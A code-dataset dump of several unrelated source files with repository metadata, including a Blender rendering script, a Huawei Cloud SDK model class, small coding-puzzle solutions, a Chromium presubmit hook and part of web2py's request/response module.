## apply region restrictions to input vcfs
if args.restrict_regions_bed:
pred_vcf = restrict_regions(pred_vcf, args.restrict_regions_bed)
truth_vcf = restrict_regions(truth_vcf, args.restrict_regions_bed)
## Load input vcfs to python df
df_pred = configure_vcf(pred_vcf,'RNA_SNP') ## load prediction vcf
df_ref = configure_vcf(truth_vcf,'Ref_SNP')
## merge dfs
df = pd.merge(pd.DataFrame(df_pred, columns = ['CHROMPOS','CHROM', 'POS', 'RNA_SNP']),
pd.DataFrame(df_ref, columns = ['CHROMPOS', 'CHROM' ,'POS', 'Ref_SNP']),
on=['CHROMPOS', 'CHROM', 'POS'] ,how='outer')
#--------------------------------------
# Merge with the DBSNP vcf file to see common variants
#--------------------------------------
if args.dbsnp:
df = add_variant_attribute_from_vcf(df, args.dbsnp, 'dbsnp_SNP')
#--------------------------------------
# Merge with the rnaediting vcf file
#--------------------------------------
if args.rnaediting:
# rnaediting column idxs are slightly off from expected vcf formatting, requires slight adjustment.
df = add_variant_attribute_from_vcf(df, args.rnaediting, 'rnaediting_SNP', refallele_idx=2, varallele_idx=3)
#--------------------------------------
# Merge with the COSMIC vcf file
#--------------------------------------
if args.cosmic:
df = add_variant_attribute_from_vcf(df, args.cosmic, 'cosmic_SNP')
print('VCFs loaded.')
## get rna-seq depth info
df = add_depth_info(df, args.bam_file, 'RNAseq_Depth')
if args.exome_bam:
df = add_depth_info(df, args.exome_bam, "Exome_Depth")
## make filtering a separate script.
##filter out the indels
#if args.filter_indels :
# print('Filtering Indels ... ')
# mask = (df['RNA_SNP'].astype(str).str.len() <= 3) & (df['Ref_SNP'].astype(str).str.len() <= 3)
# df = df.loc[mask]
df.to_csv(args.out_file,sep = '\t', index=False, na_rep='NA')
print('Done!')
if __name__ == '__main__':
main()
| [
"[email protected]"
] | |
0684d234e85f6b170a94bbdd8fe260adcc0f1b90 | 0296bc69a0d9608ed826ad7a719395f019df098f | /old_modules/render_model_1.py | 9fc3f68c9e69607c41d3e1a6f72240c17d64ea5e | [] | no_license | jcn16/Blender_HDRmap_render | c0486a77e04c5b41a6f75f123dbdb3d10c682367 | 50e6cdb79fef83081de9830e7105dd425a235a9e | refs/heads/main | 2023-07-19T22:22:53.622052 | 2021-08-20T06:29:10 | 2021-08-20T06:29:10 | 377,757,283 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,746 | py | from math import radians, sin, cos, pi
import mathutils, bpy, argparse, random, time, os,logging
def generate_rand(a=0, b=1, only_positive=False):
x = (random.random()-0.5) * 2*b
if abs(x) < a or (only_positive and x<0):
return generate_rand(a, b, only_positive)
else:
return x
def point_at(obj, target, roll=0):
"""
Rotate obj to look at target
:arg obj: the object to be rotated. Usually the camera
:arg target: the location (3-tuple or Vector) to be looked at
:arg roll: The angle of rotation about the axis from obj to target in radians.
Based on: https://blender.stackexchange.com/a/5220/12947 (ideasman42)
"""
if not isinstance(target, mathutils.Vector):
target = mathutils.Vector(target)
loc = obj.location
# direction points from the object to the target
direction = target - loc
quat = direction.to_track_quat('-Z', 'Y')
# /usr/share/blender/scripts/addons/add_advanced_objects_menu/arrange_on_curve.py
quat = quat.to_matrix().to_4x4()
rollMatrix = mathutils.Matrix.Rotation(roll, 4, 'Z')
# remember the current location, since assigning to obj.matrix_world changes it
loc = loc.to_tuple()
obj.matrix_world = quat * rollMatrix
obj.location = loc
# init & params
logger = logging.getLogger()
logger.setLevel(logging.ERROR)
random.seed(time.time())
light_num_low, light_num_high = 6, 12
light_loc_low, light_loc_high = 3, 6
#context = bpy.context
model_path = '/media/jcn/新加卷/JCN/CLOTHES/Human_model/衬衫裙子/model_3'
model = "model_3.obj"
render_path = "/media/jcn/新加卷/JCN/CLOTHES/Results/2/%08d.png"
quat_file = "/media/jcn/新加卷/JCN/CLOTHES/Results/2/result.txt"
# Delete default cube
bpy.data.objects['Cube'].select = True
bpy.ops.object.delete()
for obj in bpy.data.objects:
bpy.data.objects[obj.name].select = True
bpy.ops.object.delete()
# rendering process
# create a scene
#scene = bpy.data.scenes.new("Scene")
scene = bpy.context.scene
context=bpy.context
# create a camera
camera_data = bpy.data.cameras.new("Camera")
camera = bpy.data.objects.new("Camera", camera_data)
distance, alpha, beta, gamma = 4.5, 1.0, 89.0, 0.0
alpha, beta, gamma = radians(alpha), radians(beta), radians(gamma)
camera.location = mathutils.Vector((distance*cos(beta)*cos(alpha), distance*cos(beta)*sin(alpha), distance*sin(beta)))
point_at(camera, mathutils.Vector((0, -0.4, 0)), roll=gamma)
print('camera by looked_at', camera.location, camera.rotation_euler, camera.rotation_euler.to_quaternion())
scene.objects.link(camera)
# Create lights (lights with random num in random directions)
# light number:6~12, point light
light_num = random.randint(a=light_num_low, b=light_num_high)
print('create %d light(s) at:', light_num)
for idx in range(light_num):
light_data = bpy.data.lamps.new('light'+str(idx), type='POINT')
light = bpy.data.objects.new('light'+str(idx), light_data)
light_loc = (generate_rand(light_loc_low, light_loc_high), generate_rand(light_loc_low, light_loc_high), generate_rand(light_loc_low, light_loc_high, True))
light.location = mathutils.Vector(light_loc)
scene.objects.link(light)
light_data = bpy.data.lamps.new('light', type='POINT')
light = bpy.data.objects.new('light', light_data)
light.location = mathutils.Vector((0, 0, 8))
scene.objects.link(light)
scene.update()
scene.render.resolution_x = 2048
scene.render.resolution_y = 2048
scene.render.resolution_percentage = 100
scene.render.alpha_mode = 'TRANSPARENT'
scene.camera = camera
path = os.path.join(model_path, model)
# make a new scene with cam and lights linked
context.screen.scene = scene
bpy.ops.scene.new(type='LINK_OBJECTS')
context.scene.name = model_path
cams = [c for c in context.scene.objects if c.type == 'CAMERA']
print(cams)
bpy.context.scene.use_nodes = True
tree = bpy.context.scene.node_tree
links = tree.links
bpy.context.scene.render.image_settings.color_depth = '8'
bpy.context.scene.render.image_settings.color_mode = 'RGB'
# Clear default nodes
for n in tree.nodes:
tree.nodes.remove(n)
# 必须设置,否则无法输出法向
bpy.context.scene.render.layers['RenderLayer'].use_pass_normal = True
bpy.context.scene.render.layers["RenderLayer"].use_pass_color = True
bpy.context.scene.render.image_settings.file_format = 'PNG'
# Create input render layer node.
render_layers = tree.nodes.new('CompositorNodeRLayers')
scale_normal = tree.nodes.new(type="CompositorNodeMixRGB")
scale_normal.blend_type = 'MULTIPLY'
scale_normal.inputs[2].default_value = (0.5, 0.5, 0.5, 1)
links.new(render_layers.outputs['Normal'], scale_normal.inputs[1])
bias_normal = tree.nodes.new(type="CompositorNodeMixRGB")
bias_normal.blend_type = 'ADD'
bias_normal.inputs[2].default_value = (0.5, 0.5, 0.5, 0)
links.new(scale_normal.outputs[0], bias_normal.inputs[1])
normal_file_output = tree.nodes.new(type="CompositorNodeOutputFile")
normal_file_output.label = 'Normal Output'
links.new(bias_normal.outputs[0], normal_file_output.inputs[0])
# Remap as other types can not represent the full range of depth.
depth_file_output = tree.nodes.new(type="CompositorNodeOutputFile")
depth_file_output.label = 'Depth Output'
map = tree.nodes.new(type="CompositorNodeMapValue")
# Size is chosen kind of arbitrarily, try out until you're satisfied with resulting depth map.
map.offset = [-0.7]
map.size = [0.1]
map.use_min = True
map.min = [0]
links.new(render_layers.outputs['Depth'], map.inputs[0])
links.new(map.outputs[0], depth_file_output.inputs[0])
# image_file_output = tree.nodes.new(type="CompositorNodeOutputFile")
# image_file_output.label = 'Image'
# links.new(render_layers.outputs['Image'], image_file_output.inputs[0])
#print('image_idx: %08d, camera: (%.3f,%.3f,%.3f)' % (image_idx, a * 180. /pi, b * 180. / pi, g * 180. / pi))
albedo_file_output = tree.nodes.new(type="CompositorNodeOutputFile")
albedo_file_output.label = 'Albedo Output'
links.new(render_layers.outputs['Color'], albedo_file_output.inputs[0])
# import model
bpy.ops.import_scene.obj(filepath=path, axis_forward='-Z', axis_up='Y', filter_glob="*.obj;*.mtl") #-Z, Y
# print('scene objects:')
for o in context.scene.objects:
print(o)
for obj in context.scene.objects:
if obj.name in ['Camera.001'] + ['light'+str(idx) for idx in range(light_num)]:
continue
else:
obj.location = mathutils.Vector((0, 0, -2.0))
obj.scale = mathutils.Vector((0.002, 0.002, 0.002))
c = cams[0]
scene = bpy.context.scene
#scene = bpy.context.scene
f_quat = open(quat_file, 'w')
image_idx = 0
for g in [0]:
g = radians(float(g))
for b in [20, -20]:
b = radians(float(b))
for a in range(1, 360, 60):
a = radians(float(a))
c.location = mathutils.Vector((distance*cos(b)*cos(a), distance*cos(b)*sin(a), distance*sin(b)))
point_at(c, mathutils.Vector((0, -0.4, 0)), roll = g)
quat = c.rotation_euler.to_quaternion()
for output_node in [normal_file_output, depth_file_output,albedo_file_output]:
output_node.base_path = ''
scene.render.filepath = '/media/jcn/新加卷/JCN/CLOTHES/Results/2/image_%03d' % image_idx
# image_file_output.file_slots[0].path = '/media/jcn/新加卷/JCN/CLOTHES/Results/2/image%d' % image_idx
normal_file_output.file_slots[0].path = '/media/jcn/新加卷/JCN/CLOTHES/Results/2/normal_%03d' % image_idx
depth_file_output.file_slots[0].path = '/media/jcn/新加卷/JCN/CLOTHES/Results/2/depth_%03d' % image_idx
albedo_file_output.file_slots[0].path = '/media/jcn/新加卷/JCN/CLOTHES/Results/2/albedo_%03d' % image_idx
bpy.ops.render.render(use_viewport=True,write_still=True)
#context.scene.render.filepath = render_path % image_idx
f_quat.write('%08d,%.4f,%.4f,%.4f,%.4f,%.4f,%.4f,%.4f\n' % (image_idx, quat[0], quat[1], quat[2], quat[3], a * 180 /pi, b * 180 / pi, g * 180 / pi))
image_idx = image_idx + 1
f_quat.close()
| [
"[email protected]"
] | |
5b66423e71498cd6180f23934fe7cc35d8fdb9e0 | 9b64f0f04707a3a18968fd8f8a3ace718cd597bc | /huaweicloud-sdk-rms/huaweicloudsdkrms/v1/model/list_resources_response.py | dacd35a56aafb9e80f1c69849e3d804d2346de25 | [
"Apache-2.0"
] | permissive | jaminGH/huaweicloud-sdk-python-v3 | eeecb3fb0f3396a475995df36d17095038615fba | 83ee0e4543c6b74eb0898079c3d8dd1c52c3e16b | refs/heads/master | 2023-06-18T11:49:13.958677 | 2021-07-16T07:57:47 | 2021-07-16T07:57:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,605 | py | # coding: utf-8
import re
import six
from huaweicloudsdkcore.sdk_response import SdkResponse
class ListResourcesResponse(SdkResponse):
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'resources': 'list[ResourceEntity]',
'page_info': 'PageInfo'
}
attribute_map = {
'resources': 'resources',
'page_info': 'page_info'
}
def __init__(self, resources=None, page_info=None):
"""ListResourcesResponse - a model defined in huaweicloud sdk"""
super(ListResourcesResponse, self).__init__()
self._resources = None
self._page_info = None
self.discriminator = None
if resources is not None:
self.resources = resources
if page_info is not None:
self.page_info = page_info
@property
def resources(self):
"""Gets the resources of this ListResourcesResponse.
资源列表
:return: The resources of this ListResourcesResponse.
:rtype: list[ResourceEntity]
"""
return self._resources
@resources.setter
def resources(self, resources):
"""Sets the resources of this ListResourcesResponse.
资源列表
:param resources: The resources of this ListResourcesResponse.
:type: list[ResourceEntity]
"""
self._resources = resources
@property
def page_info(self):
"""Gets the page_info of this ListResourcesResponse.
:return: The page_info of this ListResourcesResponse.
:rtype: PageInfo
"""
return self._page_info
@page_info.setter
def page_info(self, page_info):
"""Sets the page_info of this ListResourcesResponse.
:param page_info: The page_info of this ListResourcesResponse.
:type: PageInfo
"""
self._page_info = page_info
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
import simplejson as json
return json.dumps(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, ListResourcesResponse):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
"[email protected]"
] | |
4ca9bd19679fbb30fc5ed30b750ee022fc94c075 | 5ffdf4ddee5700e6bb3b062a07c1a9cf7e6adbc1 | /PYTHON/Strings/capitalize.py | 8cc94026d63e0fa32d0b508f4cfd21061a7f66e7 | [
"MIT"
] | permissive | byung-u/HackerRank | 23df791f9460970c3b4517cb7bb15f615c5d47d0 | 4c02fefff7002b3af774b99ebf8d40f149f9d163 | refs/heads/master | 2021-05-05T13:05:46.722675 | 2018-03-30T08:07:36 | 2018-03-30T08:07:36 | 104,960,152 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 383 | py | #!/usr/bin/env python3
def capitalize(string):
s = string.split(' ')
for i in range(0, len(s)):
if len(s[i]) == 0:
continue
if len(s[i][0]) != 0 and s[i][0].isalpha():
s[i] = s[i].title()
return ' '.join(s)
if __name__ == '__main__':
string = input()
capitalized_string = capitalize(string)
print(capitalized_string)
| [
"[email protected]"
] | |
e3c98e936946924d57a64be20bd0d6c76705512b | e55480007fde8acea46fe8eeb3ee7193c25ba113 | /src/leetcode/1-99/09.py | 4b14b2dee65b6c8465f1912a9386dbbec7fe586c | [] | no_license | Annihilation7/Ds-and-Al | 80301bf543ec2eb4b3a9810f5fc25b0386847fd3 | a0bc5f5ef4a92c0e7a736dcff77df61d46b57409 | refs/heads/master | 2020-09-24T05:04:41.250051 | 2020-02-15T10:31:10 | 2020-02-15T10:31:10 | 225,669,366 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,191 | py | # -*- coding: utf-8 -*-
# Email: [email protected]
# Created: 2019-12-09 12:11am
'''
判断一个整数是否是回文数。回文数是指正序(从左向右)和倒序(从右向左)读都是一样的整数。
示例 1:
输入: 121
输出: true
示例 2:
输入: -121
输出: false
解释: 从左向右读, 为 -121 。 从右向左读, 为 121- 。因此它不是一个回文数。
示例 3:
输入: 10
输出: false
解释: 从右向左读, 为 01 。因此它不是一个回文数。
'''
class Solution:
def isPalindrome(self, x: int) -> bool:
'''
负数直接先pass
用类似头尾双指针的方法来做这道题
'''
if x < 0:
return False
k = 1
while x // k >= 10:
k *= 10
while x:
left = x // k
right = x % 10
if left != right:
return False
# 最关键的两步
# 一个是如何求除了左右两数字之外剩下的数
# 一个是k应该怎么变化
# 举个小例子看一下就好了,不难
x = x % k // 10
k //= 100
return True
| [
"[email protected]"
] | |
64be974da5067480a0088094c5764bb85d240db1 | 3b9b4049a8e7d38b49e07bb752780b2f1d792851 | /src/ui/webui/resources/PRESUBMIT.py | 2ac87faf2b09787c19200dad102e395811d7661e | [
"BSD-3-Clause",
"Apache-2.0"
] | permissive | webosce/chromium53 | f8e745e91363586aee9620c609aacf15b3261540 | 9171447efcf0bb393d41d1dc877c7c13c46d8e38 | refs/heads/webosce | 2020-03-26T23:08:14.416858 | 2018-08-23T08:35:17 | 2018-09-20T14:25:18 | 145,513,343 | 0 | 2 | Apache-2.0 | 2019-08-21T22:44:55 | 2018-08-21T05:52:31 | null | UTF-8 | Python | false | false | 1,001 | py | # Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import re
def PostUploadHook(cl, change, output_api):
rietveld_obj = cl.RpcServer()
description = rietveld_obj.get_description(cl.issue)
existing_bots = (change.CQ_INCLUDE_TRYBOTS or '').split(';')
clean_bots = set(filter(None, map(lambda s: s.strip(), existing_bots)))
new_bots = clean_bots | set(['tryserver.chromium.linux:closure_compilation'])
new_tag = 'CQ_INCLUDE_TRYBOTS=%s' % ';'.join(new_bots)
if clean_bots:
tag_reg = '^CQ_INCLUDE_TRYBOTS=.*$'
new_description = re.sub(tag_reg, new_tag, description, flags=re.M | re.I)
else:
new_description = description + '\n' + new_tag
if new_description == description:
return []
rietveld_obj.update_description(cl.issue, new_description)
return [output_api.PresubmitNotifyResult(
'Automatically added optional Closure bots to run on CQ.')]
| [
"[email protected]"
] | |
1ecae13285e6b4e11101cf69d5d4f92b64b71913 | 8fd55e7a0f8764b3fe894d927c39173507f03855 | /sms/urls.py | f75a34a656dee837302b3de1b925fe0d38081e04 | [] | no_license | bogdal/django-sms | 2ed97cbafd7c2a9b4b1521c766e89b2514b63e75 | fa0ed8369228b2b3160e8b577b6377587ce1fe5a | refs/heads/master | 2020-04-05T08:22:29.864245 | 2013-04-24T09:28:34 | 2013-04-24T09:28:34 | 3,496,819 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 410 | py | from django.conf.urls import patterns, url
from sms.decorators import ip_restrictions
from sms.views import callback_received_sms, callback_delivery_report
urlpatterns = patterns('',
url(r'^callback/received-sms/$', ip_restrictions(callback_received_sms), name='callback-received-sms'),
url(r'^callback/delivery-report/$', ip_restrictions(callback_delivery_report), name='callback-delivery-report'),
) | [
"[email protected]"
] | |
a941a491e4d0a708c173a78c324d020376c894ea | bf1a44cb4836a60800d73c1f9e5fe0e25328cb43 | /web2py/gluon/globals.py | 43a28e45bc30e8c68bc8e39cdb0409b9583a43f0 | [
"LGPL-3.0-only",
"LicenseRef-scancode-free-unknown",
"LicenseRef-scancode-warranty-disclaimer",
"MIT",
"BSD-3-Clause",
"LGPL-2.0-or-later",
"GPL-2.0-only",
"Apache-2.0",
"BSD-2-Clause"
] | permissive | aduckworth1969/smc | 22874e8f8c80fb727fa3aa8f12b95c4351097de1 | b1771d9ed68f0e35f46271aab5b1e1fab363e3d9 | refs/heads/master | 2023-04-05T14:23:07.486512 | 2021-04-07T16:15:45 | 2021-04-07T16:15:45 | 311,796,699 | 0 | 0 | MIT | 2021-04-07T16:15:46 | 2020-11-10T22:09:59 | Python | UTF-8 | Python | false | false | 51,798 | py | # -*- coding: utf-8 -*-
"""
| This file is part of the web2py Web Framework
| Copyrighted by Massimo Di Pierro <[email protected]>
| License: LGPLv3 (http://www.gnu.org/licenses/lgpl.html)
Contains the classes for the global used variables:
- Request
- Response
- Session
"""
from gluon._compat import pickle, StringIO, copyreg, Cookie, urlparse, PY2, iteritems, to_unicode, to_native, \
to_bytes, unicodeT, long, hashlib_md5, urllib_quote, to_native
from gluon.storage import Storage, List
from gluon.streamer import streamer, stream_file_or_304_or_206, DEFAULT_CHUNK_SIZE
from gluon.contenttype import contenttype
from gluon.html import xmlescape, TABLE, TR, PRE, URL
from gluon.http import HTTP, redirect
from gluon.fileutils import up
from gluon.serializers import json, custom_json
import gluon.settings as settings
from gluon.utils import web2py_uuid, secure_dumps, secure_loads
from gluon.settings import global_settings
from gluon import recfile
from gluon.cache import CacheInRam
import hashlib
from pydal.contrib import portalocker
from pickle import Pickler, MARK, DICT, EMPTY_DICT
# from types import DictionaryType
import datetime
import re
import os
import sys
import traceback
import threading
import cgi
import copy
import tempfile
import json as json_parser
FMT = '%a, %d-%b-%Y %H:%M:%S PST'
PAST = 'Sat, 1-Jan-1971 00:00:00'
FUTURE = 'Tue, 1-Dec-2999 23:59:59'
try:
# FIXME PY3
from gluon.contrib.minify import minify
have_minify = True
except ImportError:
have_minify = False
__all__ = ['Request', 'Response', 'Session']
current = threading.local() # thread-local storage for request-scope globals
css_template = '<link href="%s" rel="stylesheet" type="text/css" />'
js_template = '<script src="%s" type="text/javascript"></script>'
coffee_template = '<script src="%s" type="text/coffee"></script>'
typescript_template = '<script src="%s" type="text/typescript"></script>'
less_template = '<link href="%s" rel="stylesheet/less" type="text/css" />'
css_inline = '<style type="text/css">\n%s\n</style>'
js_inline = '<script type="text/javascript">\n%s\n</script>'
template_mapping = {
'css': css_template,
'js': js_template,
'coffee': coffee_template,
'ts': typescript_template,
'less': less_template,
'css:inline': css_inline,
'js:inline': js_inline
}
# IMPORTANT:
# this is required so that pickled dict(s) and class.__dict__
# are sorted and web2py can detect without ambiguity when a session changes
class SortingPickler(Pickler):
def save_dict(self, obj):
self.write(EMPTY_DICT if self.bin else MARK + DICT)
self.memoize(obj)
self._batch_setitems([(key, obj[key]) for key in sorted(obj)])
if PY2:
SortingPickler.dispatch = copy.copy(Pickler.dispatch)
SortingPickler.dispatch[dict] = SortingPickler.save_dict
else:
SortingPickler.dispatch_table = copyreg.dispatch_table.copy()
SortingPickler.dispatch_table[dict] = SortingPickler.save_dict
def sorting_dumps(obj, protocol=None):
file = StringIO()
SortingPickler(file, protocol).dump(obj)
return file.getvalue()
# END #####################################################################
def copystream(src, dest, size, chunk_size, cache_inc=None):
while size > 0:
if size < chunk_size:
data = src.read(size)
callable(cache_inc) and cache_inc(size)
else:
data = src.read(chunk_size)
callable(cache_inc) and cache_inc(chunk_size)
length = len(data)
if length > size:
(data, length) = (data[:size], size)
size -= length
if length == 0:
break
dest.write(data)
if length < chunk_size:
break
dest.seek(0)
return
def copystream_progress(request, chunk_size=10 ** 5):
"""
Copies request.env.wsgi_input into request.body
and stores progress upload status in cache_ram
X-Progress-ID:length and X-Progress-ID:uploaded
"""
env = request.env
if not env.get('CONTENT_LENGTH', None):
return StringIO()
source = env['wsgi.input']
try:
size = int(env['CONTENT_LENGTH'])
except ValueError:
raise HTTP(400, "Invalid Content-Length header")
try: # Android requires this
dest = tempfile.NamedTemporaryFile()
except NotImplementedError: # and GAE this
dest = tempfile.TemporaryFile()
if 'X-Progress-ID' not in request.get_vars:
copystream(source, dest, size, chunk_size)
return dest
cache_key = 'X-Progress-ID:' + request.get_vars['X-Progress-ID']
cache_ram = CacheInRam(request) # same as cache.ram because meta_storage
cache_ram(cache_key + ':length', lambda: size, 0)
cache_ram(cache_key + ':uploaded', lambda: 0, 0)
copystream(source, dest, size, chunk_size,
lambda v : cache_ram.increment(cache_key + ':uploaded', v))
cache_ram(cache_key + ':length', None)
cache_ram(cache_key + ':uploaded', None)
return dest
class Request(Storage):
"""
Defines the request object and the default values of its members
- env: environment variables, by gluon.main.wsgibase()
- cookies
- get_vars
- post_vars
- vars
- folder
- application
- function
- method
- args
- extension
- now: datetime.datetime.now()
- utcnow : datetime.datetime.utcnow()
- is_local
- is_https
- restful()
"""
def __init__(self, env):
Storage.__init__(self)
self.env = Storage(env)
self.env.web2py_path = global_settings.applications_parent
self.env.update(global_settings)
self.cookies = Cookie.SimpleCookie()
self.method = self.env.get('REQUEST_METHOD')
self._get_vars = None
self._post_vars = None
self._vars = None
self._body = None
self.folder = None
self.application = None
self.function = None
self.args = List()
self.extension = 'html'
self.now = datetime.datetime.now()
self.utcnow = datetime.datetime.utcnow()
self.is_restful = False
self.is_https = False
self.is_local = False
self.global_settings = settings.global_settings
self._uuid = None
def parse_get_vars(self):
"""Takes the QUERY_STRING and unpacks it to get_vars
"""
query_string = self.env.get('query_string', '')
dget = urlparse.parse_qs(query_string, keep_blank_values=1)
# Ref: https://docs.python.org/2/library/cgi.html#cgi.parse_qs
get_vars = self._get_vars = Storage(dget)
for (key, value) in iteritems(get_vars):
if isinstance(value, list) and len(value) == 1:
get_vars[key] = value[0]
def parse_post_vars(self):
"""Takes the body of the request and unpacks it into
post_vars. application/json is also automatically parsed
"""
env = self.env
post_vars = self._post_vars = Storage()
body = self.body
# if content-type is application/json, we must read the body
is_json = env.get('content_type', '')[:16] == 'application/json'
if is_json:
try:
# In Python 3 versions prior to 3.6 load doesn't accept bytes and
# bytearray, so we read the body convert to native and use loads
# instead of load.
# This line can be simplified to json_vars = json_parser.load(body)
# if and when we drop support for python versions under 3.6
json_vars = json_parser.loads(to_native(body.read()))
except:
# incoherent request bodies can still be parsed "ad-hoc"
json_vars = {}
pass
# update vars and get_vars with what was posted as json
if isinstance(json_vars, dict):
post_vars.update(json_vars)
body.seek(0)
# parse POST variables on POST, PUT, BOTH only in post_vars
if body and not is_json and env.request_method in ('POST', 'PUT', 'DELETE', 'BOTH'):
query_string = env.pop('QUERY_STRING', None)
content_disposition = env.get('HTTP_CONTENT_DISPOSITION')
if content_disposition:
headers = {'content-disposition': content_disposition,
'content-type': env['CONTENT_TYPE'],
'content-length': env['CONTENT_LENGTH'],
}
else:
headers = None
dpost = cgi.FieldStorage(fp=body, environ=env, headers=headers, keep_blank_values=1)
try:
post_vars.update(dpost)
except:
pass
if query_string is not None:
env['QUERY_STRING'] = query_string
# The same detection used by FieldStorage to detect multipart POSTs
body.seek(0)
def listify(a):
return (not isinstance(a, list) and [a]) or a
try:
keys = sorted(dpost)
except TypeError:
keys = []
for key in keys:
if key is None:
continue # not sure why cgi.FieldStorage returns None key
dpk = dpost[key]
# if an element is not a file replace it with
# its value else leave it alone
pvalue = listify([(_dpk if _dpk.filename else _dpk.value)
for _dpk in dpk]
if isinstance(dpk, list) else
(dpk if dpk.filename else dpk.value))
if len(pvalue):
post_vars[key] = (len(pvalue) > 1 and pvalue) or pvalue[0]
@property
def body(self):
if self._body is None:
try:
self._body = copystream_progress(self)
except IOError:
raise HTTP(400, "Bad Request - HTTP body is incomplete")
return self._body
def parse_all_vars(self):
"""Merges get_vars and post_vars to vars
"""
self._vars = copy.copy(self.get_vars)
for key, value in iteritems(self.post_vars):
if key not in self._vars:
self._vars[key] = value
else:
if not isinstance(self._vars[key], list):
self._vars[key] = [self._vars[key]]
self._vars[key] += value if isinstance(value, list) else [value]
@property
def get_vars(self):
"""Lazily parses the query string into get_vars
"""
if self._get_vars is None:
self.parse_get_vars()
return self._get_vars
@property
def post_vars(self):
"""Lazily parse the body into post_vars
"""
if self._post_vars is None:
self.parse_post_vars()
return self._post_vars
@property
def vars(self):
"""Lazily parses all get_vars and post_vars to fill vars
"""
if self._vars is None:
self.parse_all_vars()
return self._vars
@property
def uuid(self):
"""Lazily uuid
"""
if self._uuid is None:
self.compute_uuid()
return self._uuid
def compute_uuid(self):
self._uuid = '%s/%s.%s.%s' % (
self.application,
self.client.replace(':', '_'),
self.now.strftime('%Y-%m-%d.%H-%M-%S'),
web2py_uuid())
return self._uuid
def user_agent(self):
from gluon.contrib import user_agent_parser
session = current.session
user_agent = session._user_agent
if user_agent:
return user_agent
http_user_agent = self.env.http_user_agent or ''
user_agent = user_agent_parser.detect(http_user_agent)
for key, value in user_agent.items():
if isinstance(value, dict):
user_agent[key] = Storage(value)
user_agent = Storage(user_agent)
user_agent.is_mobile = 'Mobile' in http_user_agent
user_agent.is_tablet = 'Tablet' in http_user_agent
session._user_agent = user_agent
return user_agent
def requires_https(self):
"""
If request comes in over HTTP, redirects it to HTTPS
and secures the session.
"""
cmd_opts = global_settings.cmd_options
# checking if this is called within the scheduler or within the shell
# in addition to checking if it's a cron job
if (self.is_https or self.is_scheduler or cmd_opts and (
cmd_opts.shell or cmd_opts.cron_job)):
current.session.secure()
else:
current.session.forget()
redirect(URL(scheme='https', args=self.args, vars=self.vars))
def restful(self, ignore_extension=False):
def wrapper(action, request=self):
def f(_action=action, *a, **b):
request.is_restful = True
env = request.env
is_json = env.content_type == 'application/json'
method = env.request_method
if not ignore_extension and len(request.args) and '.' in request.args[-1]:
request.args[-1], _, request.extension = request.args[-1].rpartition('.')
current.response.headers['Content-Type'] = \
contenttype('.' + request.extension.lower())
rest_action = _action().get(method, None)
if not (rest_action and method == method.upper()
and callable(rest_action)):
raise HTTP(405, "method not allowed")
try:
res = rest_action(*request.args, **request.vars)
if is_json and not isinstance(res, str):
res = json(res)
return res
except TypeError as e:
exc_type, exc_value, exc_traceback = sys.exc_info()
if len(traceback.extract_tb(exc_traceback)) == 1:
raise HTTP(400, "invalid arguments")
else:
raise
f.__doc__ = action.__doc__
f.__name__ = action.__name__
return f
return wrapper
class Response(Storage):
"""
Defines the response object and the default values of its members
response.write( ) can be used to write in the output html
"""
def __init__(self):
Storage.__init__(self)
self.status = 200
self.headers = dict()
self.headers['X-Powered-By'] = 'web2py'
self.body = StringIO()
self.session_id = None
self.cookies = Cookie.SimpleCookie()
self.postprocessing = []
self.flash = '' # used by the default view layout
self.meta = Storage() # used by web2py_ajax.html
self.menu = [] # used by the default view layout
self.files = [] # used by web2py_ajax.html
self._vars = None
self._caller = lambda f: f()
self._view_environment = None
self._custom_commit = None
self._custom_rollback = None
self.generic_patterns = ['*']
self.delimiters = ('{{', '}}')
self.formstyle = 'table3cols'
self.form_label_separator = ': '
def write(self, data, escape=True):
if not escape:
self.body.write(str(data))
else:
self.body.write(to_native(xmlescape(data)))
def render(self, *a, **b):
from gluon.compileapp import run_view_in
if len(a) > 2:
raise SyntaxError(
'Response.render can be called with two arguments, at most')
elif len(a) == 2:
(view, self._vars) = (a[0], a[1])
elif len(a) == 1 and isinstance(a[0], str):
(view, self._vars) = (a[0], {})
elif len(a) == 1 and hasattr(a[0], 'read') and callable(a[0].read):
(view, self._vars) = (a[0], {})
elif len(a) == 1 and isinstance(a[0], dict):
(view, self._vars) = (None, a[0])
else:
(view, self._vars) = (None, {})
self._vars.update(b)
self._view_environment.update(self._vars)
if view:
from gluon._compat import StringIO
(obody, oview) = (self.body, self.view)
(self.body, self.view) = (StringIO(), view)
page = run_view_in(self._view_environment)
self.body.close()
(self.body, self.view) = (obody, oview)
else:
page = run_view_in(self._view_environment)
return page
def include_meta(self):
s = "\n"
for meta in iteritems((self.meta or {})):
k, v = meta
if isinstance(v, dict):
s += '<meta' + ''.join(' %s="%s"' % (to_native(xmlescape(key)),
to_native(xmlescape(v[key]))) for key in v) + ' />\n'
else:
s += '<meta name="%s" content="%s" />\n' % (k, to_native(xmlescape(v)))
self.write(s, escape=False)
def include_files(self, extensions=None):
"""
Includes files (usually in the head).
Can minify and cache local files
By default, caches in ram for 5 minutes. To change,
response.cache_includes = (cache_method, time_expire).
